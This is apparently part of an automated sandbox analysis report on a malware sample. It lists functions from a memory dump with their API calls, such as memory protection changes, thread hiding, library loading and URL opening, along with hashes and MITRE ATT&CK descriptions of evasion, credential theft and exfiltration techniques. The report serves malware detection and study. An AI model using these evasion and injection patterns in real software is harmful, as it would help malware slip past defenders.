Opcode Fuzzy Hash: 154642d6b5752dbb4d52f3c1df3542818f969f9e80eb4191e474d555a7d012b3
Instruction Fuzzy Hash: EEF0BE2470E39A8ADB1EAB7496D43B82E6EFD4370979C09CD9ED28BAD5D7110858C310

Uniqueness

Uniqueness Score: -1.00%

Function 00566315, Relevance: 1.5, APIs: 1, Instructions: 42nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: b8f70c85a5bfbdee6750cabcab90aeb1b02b76b49781d1f2b91aac833db8433f
Instruction ID: 87accdf4fa7f60f0ea7bab248557843036c7c6f77d83552d9029bc6ad3c9dad2
Opcode Fuzzy Hash: b8f70c85a5bfbdee6750cabcab90aeb1b02b76b49781d1f2b91aac833db8433f
Instruction Fuzzy Hash: 57F0E22070D393DADB1D9B7486A43B52E6ABC427197AC0D8D8E538B794CB104888C711

Uniqueness

Uniqueness Score: -1.00%

Function 00566328, Relevance: 1.5, APIs: 1, Instructions: 41nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 80115b5e9a527e7ef82ced6b2bd3f7731135b778d90880c0b1ab290973c5bcce
Instruction ID: f29b5c638a4768b4a417f3084739b05c05278301d5e7c1410e7604d59eedd927
Opcode Fuzzy Hash: 80115b5e9a527e7ef82ced6b2bd3f7731135b778d90880c0b1ab290973c5bcce
Instruction Fuzzy Hash: ADF0EC2030D397DADB299B3496E43B52E2EBC43308BAC0E8A8E528B294DB100888C311

Uniqueness

Uniqueness Score: -1.00%

Function 0056633D, Relevance: 1.5, APIs: 1, Instructions: 38nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 1dc9ce3950833dd83eb011bb5b700f555ea2670b0404e2f0710301a6eb250728
Instruction ID: a821e478fa81779b3d66698f6891d27849ac67e755f2f5731fe8fd35fec68f36
Opcode Fuzzy Hash: 1dc9ce3950833dd83eb011bb5b700f555ea2670b0404e2f0710301a6eb250728
Instruction Fuzzy Hash: 7EF0203030E397CEDB1E9B3486E43B42E2EFC433087AC0D89CE528B2A4DB100848C311

Uniqueness

Uniqueness Score: -1.00%

Function 00562E46, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 5460c1e2759bd354524ba8e5697a5003c555750329d65bb813d682986eb173b6
Instruction ID: 3476024ea785d078553e326a2b67b96d5d15d417b35c7f768583ec02dbbbbc81
Opcode Fuzzy Hash: 5460c1e2759bd354524ba8e5697a5003c555750329d65bb813d682986eb173b6
Instruction Fuzzy Hash: 37F027B0408301AFE6044314AEE5F766E5CEF0B3B8B284399FC92EB0D1C76088098224

Uniqueness

Uniqueness Score: -1.00%

Function 00562D29, Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00562D7B

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 87a382ea795a3c56d51f9fa89243391d0cb481c527cbcd93d3049e01e7ea6186
Instruction ID: 863a855a20a25fa5b25249eaea49ab1ef8acfb9eb70dea9d34f304f059a961b7
Opcode Fuzzy Hash: 87a382ea795a3c56d51f9fa89243391d0cb481c527cbcd93d3049e01e7ea6186
Instruction Fuzzy Hash: 59F0A7B1409742AFE3114B24CD4DB897E9CBF163A9F160688B8A1AE4E5C7A4C988C661

Uniqueness

Uniqueness Score: -1.00%

Function 005621EF, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 0056221E

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 0f5502fcaecfeb3a09cacb89d12c3af5ed3045475c4e2fe44b50bdf3dec55b3a
Instruction ID: 000c49bc9a7b165f7950500f2ec0fa9faa254f893bb0ba0772228c980c7acef6
Opcode Fuzzy Hash: 0f5502fcaecfeb3a09cacb89d12c3af5ed3045475c4e2fe44b50bdf3dec55b3a
Instruction Fuzzy Hash: CBF0A0B440A3816BE7015B38CA8C75DBE9DAF423A8F02428CADA05B0D9D7B489488650

Uniqueness

Uniqueness Score: -1.00%

Function 00566387, Relevance: 1.5, APIs: 1, Instructions: 27nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 32021bb45c2ef72fdef401e3bcc111590570b709c89eeb4e96e1a4f95c0cd5d9
Instruction ID: e0c40e1a06d82a746fccafafeba2ae782741ad18b29caedafd4f498fec4e31b0
Opcode Fuzzy Hash: 32021bb45c2ef72fdef401e3bcc111590570b709c89eeb4e96e1a4f95c0cd5d9
Instruction Fuzzy Hash: 65E04F247093578ADB1DAF64D2D42B92E1EFD9270539C188D9A418B654D7614858C311

Uniqueness

Uniqueness Score: -1.00%

Function 00562D26, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00562D7B

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ce6bed43323d661120fbb5153dd87be2dbfad7014ca6b4b3efc8dfa0434c794f
Instruction ID: 47d25a0c0727d50b2993b8c871528812d9169614d63e77f97d7b46badad0ee93
Opcode Fuzzy Hash: ce6bed43323d661120fbb5153dd87be2dbfad7014ca6b4b3efc8dfa0434c794f
Instruction Fuzzy Hash: B3E086B1404B41AFF7110F24CD0DB893AA4BF163EAF210788B4616B0F6C7F8CAC48A61

Uniqueness

Uniqueness Score: -1.00%

Function 00562D5B, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00562D7B

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 79420dac43752f8e0190643e9b63c6827788c6020f998e15b68aebffc8f6acb5
Instruction ID: 82dfbfb86f621de723b5bcf5cd8916cde6567b959e487ea620329b42c430098f
Opcode Fuzzy Hash: 79420dac43752f8e0190643e9b63c6827788c6020f998e15b68aebffc8f6acb5
Instruction Fuzzy Hash: 93E0C27040E3865FE3119B20C58C74CBF84FF02369F1541CD98A04B0E1C7A4855CC761

Uniqueness

Uniqueness Score: -1.00%

Function 00565CF0, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565908,?,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D), ref: 00565D0B

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 75c09cfe325803e34e037c116c9d09ad36d850219469c449fad797165fa8f00d
Instruction ID: fab1b7d68f24a7d1b20d0b53f8aedc311a846d4d8fe993ec6f143d494d9e4726
Opcode Fuzzy Hash: 75c09cfe325803e34e037c116c9d09ad36d850219469c449fad797165fa8f00d
Instruction Fuzzy Hash: 73C012E12240002F68048A28CD58C6BB3AA86D5A28B50C32DB872222CCC930EC088036

Uniqueness

Uniqueness Score: -1.00%

Function 005646F7, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 388libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Strings

D*, xrefs: 00562509

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: D*
API String ID: 1029625771-570881808
Opcode ID: 04a46c825d3412dc639291d1e74d58c67ce9921f049bab1dd5c85e03477ba0ba
Instruction ID: 8a7dbf577b5796319b1eea0cb19cf904c85a5ed77590e88884c7da42f9296041
Opcode Fuzzy Hash: 04a46c825d3412dc639291d1e74d58c67ce9921f049bab1dd5c85e03477ba0ba
Instruction Fuzzy Hash: DCC13870740706AFEF211E20CD55BFA3E62FF91750F248528FE86AB2C1C7B59885AB45

Uniqueness

Uniqueness Score: -1.00%

Function 00563449, Relevance: 1.6, APIs: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000), ref: 00563488

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 41d441e882b0c2cfeee3d3eeff0a1987f10f842ed5162a5cdc93cbaba1e46db7
Instruction ID: eb98efbc12b6ae2bd24255f78eb23536d88a808400a3b655db44e943a594c8d6
Opcode Fuzzy Hash: 41d441e882b0c2cfeee3d3eeff0a1987f10f842ed5162a5cdc93cbaba1e46db7
Instruction Fuzzy Hash: E731C47024438BAFEB318F14CD88BEE3F65BF65340F148925AD4A9B151EB718A40EB11

Uniqueness

Uniqueness Score: -1.00%

Function 005630FC, Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(000000D5,00563BB5,?,005625E6,?,00000000,?,00400000,?,00000000,00000000,?,?,?,00000000,?), ref: 00563AD5

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f40a4630aa162366d88a970e428ad616d3f25ccb3a5b87774a06de9110af3e77
Instruction ID: 4c149dc6210d19157926bf5692f1c72a5d7660263bc634d3eb03eee1da1c8c35
Opcode Fuzzy Hash: f40a4630aa162366d88a970e428ad616d3f25ccb3a5b87774a06de9110af3e77
Instruction Fuzzy Hash: E421317440E3C68AC722CB7486D938ABFA8FF03304F1C84CDC8C14A093C7A08519EB96

Uniqueness

Uniqueness Score: -1.00%

Function 0056344F, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000), ref: 00563488

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 499f6ff0e0538631ea34486e8aa55f881d791b7051966ec02bb8418f4b9c9319
Instruction ID: 4362d1018b99ffaa9c7a11d5feab1f6fe4091a6fdcb9f0d4ef946cccb7043633
Opcode Fuzzy Hash: 499f6ff0e0538631ea34486e8aa55f881d791b7051966ec02bb8418f4b9c9319
Instruction Fuzzy Hash: FF21D77024838BAFEB318E10CD84BFE3F59FF11340F544429AD4A9B581EB328A44D720

Uniqueness

Uniqueness Score: -1.00%

Function 00564716, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 27f9dc7c8e9390f374a90b61b10039b4aa19425e8948407690e268dc3892af38
Instruction ID: daea78788b97e478e0354ab05078122410de470ba5b43fe86a7d0bb58856c729
Opcode Fuzzy Hash: 27f9dc7c8e9390f374a90b61b10039b4aa19425e8948407690e268dc3892af38
Instruction Fuzzy Hash: 70116B6450D3CE95CB513B30AAD47BC2E05FF43354F6849ABEDC287082CB1084499E13

Uniqueness

Uniqueness Score: -1.00%

Function 0056474E, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4a8be9b2a90c9f3381f2393e4bd903bc4527da370a06539b15eacbdbc4e5970f
Instruction ID: ab1795827b281fd4b8271e59c8d8b42d9f6cd9af986de8542037da83d4801db6
Opcode Fuzzy Hash: 4a8be9b2a90c9f3381f2393e4bd903bc4527da370a06539b15eacbdbc4e5970f
Instruction Fuzzy Hash: 7011666894D3CE66CB026770A9D137C6E49FF83754F2888EBEDC1870C2C7008849DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0056470B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 43b6dea136fe67f0710e599372ad08bb0451aa453b673ab2b79b1aa0edf5ff10
Instruction ID: f74981896fc65cf76c200210b1d1e41a61813749da62181f5797c857bc0bff82
Opcode Fuzzy Hash: 43b6dea136fe67f0710e599372ad08bb0451aa453b673ab2b79b1aa0edf5ff10
Instruction Fuzzy Hash: D101F960A48186D9CF69396059947BD1D12FFA3790F748927F94383006D72485826D53

Uniqueness

Uniqueness Score: -1.00%

Function 005647B7, Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fa28096908734d87e72682d7b591427a1a267d57f6da7c5fbd1677ac2c0abe99
Instruction ID: 46d20772fa4e8516bfc0d9d88337760aa6e9bba76d33a3dd0382c6608a0e2570
Opcode Fuzzy Hash: fa28096908734d87e72682d7b591427a1a267d57f6da7c5fbd1677ac2c0abe99
Instruction Fuzzy Hash: 70F0F66440E3DA97C7057730A9D27BC6E0EFE83344F59889AEDC1CB5C1CB109519CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0056478F, Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7dd36b095b32e727a916d03a8a85c4b4f45c8e4b51ed5149af38eedec99f5a75
Instruction ID: e9a5c17e5c524a93fe389ad9633bdb335437188510a71c31b312a89a00926877
Opcode Fuzzy Hash: 7dd36b095b32e727a916d03a8a85c4b4f45c8e4b51ed5149af38eedec99f5a75
Instruction Fuzzy Hash: 96F059249082C99ACB183B30A9D07BC1E05FF93780F34C967FDC287082C7248885AF63

Uniqueness

Uniqueness Score: -1.00%

Function 0056480E, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9b4d48dd8bc6bf2c7b183eb1f5da91990daa196073c2e4ce970985575d4772de
Instruction ID: ad787b2e25fa908f0b23d213c3eb553bf7969712d4bc2ed2341f4f13e3e64c41
Opcode Fuzzy Hash: 9b4d48dd8bc6bf2c7b183eb1f5da91990daa196073c2e4ce970985575d4772de
Instruction Fuzzy Hash: 72F0E52850E3DA5B8701B73059D936CBE4DFC82214B1980EDAD918F4C6C7644408CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005647F3, Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,005657C6,005624A6,00000000,00000000,00000000,00000000,?,00000000,00000000,0056452D,00000000,00000000), ref: 00564841

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d8431dc6307f5c42d22352512b3e72a8861ef325965f54dd37c2cda60b675057
Instruction ID: 86d86c7bfecd3787f55fa737f4270ec676669c030d7be34da9a3baadb6380d05
Opcode Fuzzy Hash: d8431dc6307f5c42d22352512b3e72a8861ef325965f54dd37c2cda60b675057
Instruction Fuzzy Hash: 86E07D6464D3DB9687053B3069E47BC2E0AFCC2384728C4AAFDC28B040CB204518DF42

Uniqueness

Uniqueness Score: -1.00%

Function 00562F87, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562F16,00562FC7), ref: 00562FA2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e6d4883f9b9cd4c8aaaade39fe579cf0a57f8bc2ad32903d463891b58212c4d6
Instruction ID: 58e06234e4adfd98c53b464d7f6930302609c6ab0994e5a3d75330c353b67c2c
Opcode Fuzzy Hash: e6d4883f9b9cd4c8aaaade39fe579cf0a57f8bc2ad32903d463891b58212c4d6
Instruction Fuzzy Hash: 63C04C757E4304BAFE34D6604D96FC566569794F00E60450A770A3D1C485F5A950C61A

Uniqueness

Uniqueness Score: -1.00%

Function 00562CBC, Relevance: 1.3, APIs: 1, Instructions: 32sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000005), ref: 00562D21

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 225b06a36e2cc07769af8134fec6844fe320a5b21529a6c17bd68dba0c6f410e
Instruction ID: 75d37ee835f32bf6ac92339ce66d02d7355e8155e69fa3a0b99a53c28d08e5ae
Opcode Fuzzy Hash: 225b06a36e2cc07769af8134fec6844fe320a5b21529a6c17bd68dba0c6f410e
Instruction Fuzzy Hash: A2F0826454D7459BE7009B1096D9B657FAAFF06355F9684D8DA898B0E2C750884AC320

Uniqueness

Uniqueness Score: -1.00%

Function 00562CD5, Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000005), ref: 00562D21

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b81369d7669247295bcedd8ec39b6f4fe8920391c3027b8b655ac4c34267048f
Instruction ID: 6ea0e10d6c66dd35b0571aeeda550cbd9a8e65f75e234a3fee39b46f0dfe44c5
Opcode Fuzzy Hash: b81369d7669247295bcedd8ec39b6f4fe8920391c3027b8b655ac4c34267048f
Instruction Fuzzy Hash: 94F0E574508B45AFE3009B10C6D9B557FEABF05315F9A84D8DA898F4E2C7208C8AC320

Uniqueness

Uniqueness Score: -1.00%

Function 00562CAB, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 005620B4: TerminateThread.KERNELBASE(000000FE,00000000), ref: 0056213C

Sleep.KERNELBASE(00000005), ref: 00562D21

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: SleepTerminateThread
String ID:
API String ID: 480259992-0
Opcode ID: 716607b7bcc6734f09fede785e4e990eaa0843666ae5a7d95064f5089cba8a29
Instruction ID: 121c396353e03a2c4cc10554506e0535c5497f0a4b9e90db229f13acbdefe2a7
Opcode Fuzzy Hash: 716607b7bcc6734f09fede785e4e990eaa0843666ae5a7d95064f5089cba8a29
Instruction Fuzzy Hash: 2DE09270244F02AFF3046B10C15EB693FA27F44356FA5C898EA494B0A3D7208C86C612

Uniqueness

Uniqueness Score: -1.00%

Function 00562CF9, Relevance: 1.3, APIs: 1, Instructions: 20sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000005), ref: 00562D21
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00562D7B

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: ddde8bf3e39c2cc6f302c59d97ea2d34fde89527e49c53bcab86693297710ca3
Instruction ID: e472fc1f45f34e546dc3d9903e025ed9a078baf98cf989e77c8730a4b09037cf
Opcode Fuzzy Hash: ddde8bf3e39c2cc6f302c59d97ea2d34fde89527e49c53bcab86693297710ca3
Instruction Fuzzy Hash: D8E0C27400874AABE3004B2089CDA55BF5EFF02715F5686C8DE508B0D2C310984AC790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00562F0F, Relevance: 5.4, Strings: 4, Instructions: 379COMMON

Download Yara Rule

Strings

604A, xrefs: 0056304F
ANCF, xrefs: 0056306F
X_', xrefs: 00563EA2
604A, xrefs: 00563039

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: 604A$604A$ANCF$X_'
API String ID: 823142352-1433388552
Opcode ID: 5eca50922615137328d344e372e71d79afe93e8eda0879c643e033ea5dc5ba22
Instruction ID: e521eee6d9da19bcc7d02bc4d1c01b97857a0cff989f76f8ff4df3a2be438f05
Opcode Fuzzy Hash: 5eca50922615137328d344e372e71d79afe93e8eda0879c643e033ea5dc5ba22
Instruction Fuzzy Hash: A2A1FE2244D7D65BCB119B3089997DAFFA8FF43364B69469DC8C18F193C7118A0EC7A1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
